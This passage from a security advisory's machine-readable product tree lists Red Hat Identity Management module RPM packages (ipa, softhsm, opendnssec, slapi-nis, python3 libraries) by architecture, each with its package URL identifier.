"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"product": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm (idm:client)",
"product_id": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1)",
"product_id": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1)",
"product_id": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-dns@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaserver@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipatests@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
